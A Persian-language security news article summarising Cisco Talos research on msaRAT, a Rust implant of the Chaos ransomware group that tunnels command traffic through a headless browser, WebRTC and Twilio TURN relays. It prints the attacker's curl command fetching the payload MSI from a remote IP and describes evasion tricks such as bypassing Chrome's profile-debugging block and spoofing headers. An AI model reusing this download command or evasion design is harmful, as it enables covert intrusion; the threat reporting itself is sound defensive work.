گروه باج‌افزاری Chaos روشی نوین و به‌شدت پنهان‌کارانه برای ارتباط با سرورهای فرمان و کنترل (C2) خود به کار گرفته است. این گروه بدافزاری، ترافیک مخرب خود را مستقیماً از طریق مرورگر خود قربانی عبور می‌دهد. تیم تحقیقاتی سیسکو تالوس (Cisco Talos) به‌تازگی جزئیات یک ایمپلنت خطرناک نوشته‌شده به زبان راست (Rust) با نام msaRAT را منتشر کرده است که پیش از فعال شدن بخش رمزگذاری، روی سیستم‌های ویندوزی شناسایی شد.

چگونه مرورگر قربانی به سپر دفاعی مهاجم تبدیل می‌شود؟

این ایمپلنت به هیچ وجه اتصال خروجی مستقیمی برقرار نمی‌کند و تمام ارتباطات آن تنها با آدرس محلی 127.0.0.1 انجام می‌شود. msaRAT مرورگر کروم یا اج (Edge) را در حالت بدون رابط کاربری (Headless) اجرا می‌کند و کنترل آن را از طریق پروتکل Chrome DevTools (CDP) که رابط برنامه‌نویسی دیباگینگ خود مرورگر است، در دست می‌گیرد.

تمامی پیام‌های C2 از طریق یک کانال داده WebRTC و با رله شدن از طریق سرویس TURN شرکت Twilio به خارج از سیستم ارسال می‌شوند. در نتیجه، سیستم‌های دفاعی و مدافعان شبکه تنها یک مرورگر را مشاهده می‌کنند که در حال ارتباط با سرویس‌های کلودفلر (Cloudflare) و توییلیو است. آدرس سرور اصلی مهاجم در هیچ مرحله‌ای از انتقال آشکار نمی‌شود.

مکانیزم فنی دور زدن امنیت در msaRAT

این بدافزار ابتدا با بررسی متغیرهای محیطی و سپس جستجو در رجیستری ویندوز به دنبال مرورگرهای کروم یا اج می‌گردد. در صورت یافتن مرورگر، آن را با سوییچ --headless=new و فعال‌سازی --remote-debugging-port اجرا می‌کند.

از نسخه 136 کروم، گوگل امکان دیباگ کردن پروفایل پیش‌فرض را مسدود کرده است تا جلوی سرقت کوکی توسط بدافزارهای سرقت اطلاعات (Infostealers) گرفته شود. با این حال، msaRAT با استفاده از یک دایرکتوری پروفایل اختصاصی (--user-data-dir) این محدودیت را دور می‌زند.

بدافزار پس از ایجاد یک تب جدید، سیاست امنیت محتوا (CSP) را غیرفعال کرده و کدهای جاوا اسکریپت خود که به‌صورت متن ساده در بخش .rdata فایل باینری ذخیره شده‌اند، تزریق می‌کند. نام چهار کال‌بک اصلی این بدافزار یعنی msaOpen، msaClose، msaError و msaMessage، به تیم تالوس کمک کرد تا نام msaRAT را برای آن انتخاب کند.

رمزگذاری دوگانه و مهندسی ترافیک شبکه

کدهای جاوا اسکریپت تزریق‌شده، پیکربندی‌های STUN و TURN را از یک Cloudflare Worker دریافت می‌کنند. هدرهای Origin و Referer به‌گونه‌ای تنظیم شده‌اند که ترافیک شبیه به ارتباطات قانونی سایت مایکروسافت باشد.

برای جلوگیری از ایجاد ارتباط مستقیم همتا به همتا (Peer-to-Peer)، پاسخ سرور بدون کاندیدای ICE و با آدرس 0.0.0.0 تنظیم شده است. این ترفند باعث می‌شود تمامی کانال داده از طریق رله توییلیو در آدرس global.turn.twilio.com منتقل شود.

ترافیک در این کانال به دو لایه رمزگذاری می‌شود. لایه بیرونی توسط مرورگر با استفاده از DTLS مدیریت می‌شود و لایه درونی از یک طرح مبتنی بر ChaCha-Poly1305 بهره می‌برد که کلید آن از طریق تبادل ECDH و یک فریم هندشِیک 0xFE تنظیم می‌شود. فریم‌های فرمان دریافتی به‌طور مستقیم به cmd.exe ارسال شده تا اجرا شوند. معماری این ایمپلنت به‌گونه‌ای طراحی شده که بتواند محموله‌های بزرگی مانند فایل‌ها و اسکرین‌شات‌ها را به‌طور قابل اعتماد منتقل کند.

روش انتشار و نفوذ اولیه

ایمپلنت msaRAT زمانی وارد سیستم می‌شود که مهاجم پیش‌تر دسترسی اولیه را به‌دست آورده است و عملیات پیش از اجرای فاز رمزگذاری فایل‌ها انجام می‌شود. روش‌های رایج این گروه شامل ارسال ایمیل‌های اسپم انبوه، ویشینگ (Vishing)، استفاده از ابزار Quick Assist مایکروسافت و ابزارهای مدیریت از راه دور (RMM) برای حفظ دسترسی است.

این بدافزار با یک دستور ساده curl دانلود و نصب می‌شود:

curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi

فایل MSI با استفاده از پورت 443 و پروتکل HTTP ساده ارسال می‌شود که در بسیاری از فایروال‌ها بدون بازرسی پروتکل عبور می‌کند. این فایل با جعل هویت آپدیت ویندوز، یک DLL سفارشی را مستقیماً در حافظه بارگذاری می‌کند و اجرای msaRAT را آغاز می‌کند.

آینده ترافیک مخفی در سایه سرویس‌های قانونی

استفاده از زیرساخت‌های قانونی مانند WebRTC و سرویس‌های ابری معتبر برای پنهان کردن ترافیک C2، رویکردی نیست که به‌زودی متوقف شود. تا زمانی که سیستم‌های دفاعی بر بازرسی ترافیک سطح شبکه تکیه کنند، بدافزارهایی مانند msaRAT با سوءاستفاده از مرورگرها به‌عنوان پراکسی، مزیت تاکتیکی خود را حفظ خواهند کرد. تکامل این ایمپلنت‌های مبتنی بر راست نشان می‌دهد که گروه‌های باج‌افزاری به جای تمرکز صرف بر رمزگذاری فایل‌ها، در حال سرمایه‌گذاری سنگین روی فناوری‌های فرار از شناسایی و مخفی‌ماندن در جریان‌های ترافیک قانونی هستند.